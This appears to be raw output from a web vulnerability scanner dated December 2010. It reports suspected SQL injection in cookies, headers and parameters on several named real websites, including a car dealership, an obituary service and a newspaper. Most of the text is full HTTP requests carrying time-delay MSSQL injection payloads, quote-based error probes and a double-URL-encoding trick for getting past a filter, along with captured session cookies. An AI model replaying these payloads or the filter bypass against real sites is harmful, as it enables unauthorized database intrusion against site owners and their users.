RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacom ...[SNIP]...
The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmc cookie. The application took 66165 milliseconds to respond to the request, compared with 45707 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server.
Request
GET /inventory.php?&VehicleType=New HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792'waitfor%20delay'0%3a0%3a20'--; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:43:48 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 82433
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>New Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 34865 milliseconds to respond to the request, compared with 394 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server.
Request
GET /quick-quote.html',0)waitfor%20delay'0%3a0%3a20'-- HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 04:22:13 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 47946
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watso ...[SNIP]...
The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmz cookie. The application took 85392 milliseconds to respond to the request, compared with 28373 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server.
Request
GET /search/CPO+t HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)',0)waitfor%20delay'0%3a0%3a20'--; PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:06:07 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 92151
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Certified Pre-Owned Toyota Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serv ...[SNIP]...
The __utmb cookie appears to be vulnerable to SQL injection attacks. The payload ,0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmb cookie. The application took 51229 milliseconds to respond to the request, compared with 23804 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server.
Request
GET /search/New+Toyota+tm HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792,0,0,0)waitfor%20delay'0%3a0%3a20'--; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:52:22 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 82699
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>New Toyota Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - S ...[SNIP]...
The Source parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the Source parameter. The application took 20353 milliseconds to respond to the request, compared with 263 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server.
Request
GET /services/obitrss.asp?Source=MercuryNews'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1 Host: www.legacy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 06:02:57 GMT Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET Content-Type: text/xml Set-Cookie: ASPSESSIONIDCSSDBCCC=BDEJAEIDNCFFJDLHCNDJDOAD; path=/ Cache-control: private Content-Length: 422
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET / HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q='
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:52:54 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=rpqctedmaoqs1lp8qp6m2t1237; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Content-Length: 21 Connection: close Content-Type: text/html
Update referer failed
Request 2
GET / HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=''
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:52:54 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=129vt2sagrtpoiqhi4qnliurm6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Connection: close Content-Type: text/html Content-Length: 15233
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>Linka ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET / HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:52:48 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=23jlt2alhsimpjdb83thqj1bk1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Content-Length: 24 Connection: close Content-Type: text/html
Update user agent failed
Request 2
GET / HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'' Connection: close
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:52:48 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=l5hsujb84ieisgntdm6051n617; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Connection: close Content-Type: text/html Content-Length: 15233
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>Linka ...[SNIP]...
1.167. http://www.linkatopia.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.linkatopia.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /?1'=1 HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:52:44 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=ck8dha87tii3i18d86dla33dp1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Content-Length: 24 Connection: close Content-Type: text/html
Update page count failed
Request 2
GET /?1''=1 HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:52:44 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=l2lgsa9e86pdberkmocnijggr3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Connection: close Content-Type: text/html Content-Length: 15233
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>Linka ...[SNIP]...
The fPage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fPage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /49ers/ci_16794130?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false'; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='When asked if the 49ers had committed to Troy Smith for the rest of the season, coach Mike ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /49ers/ci_16794130?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false''; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='When asked if the 49ers had committed to Troy Smith for the rest of the season, coach Mike ...[SNIP]...
The Zvents cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Zvents cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /action-line/ci_16799546 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4'; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='But the postal service mixed up the contents of two packages they opened sending the wrong ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /action-line/ci_16799546 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4''; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/action-line/ci_16799546?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:45:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:45:45 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 446
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
1.170. http://www.mercurynews.com/bay-area-living/ci_16790631 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.mercurynews.com
Path:
/bay-area-living/ci_16790631
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /bay-area-living/ci_16790631?1%2527=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='I had to stop to catch my breath "... and to check to see if my toes still moved. They did. ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /bay-area-living/ci_16790631?1%2527%2527=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/bay-area-living/ci_1 ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /breaking-news/ci_16799837 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='A family awoke to their doorbell ringing repeatedly this morning because of an electrical g ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /breaking-news/ci_16799837 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527%2527
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/breaking-news/ci_167 ...[SNIP]...
The __g_c cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_c cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /breaking-news/ci_16799883 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0'; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Today: Google will roll out Chrome OS notebooks next year, but you can apply for a public t ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
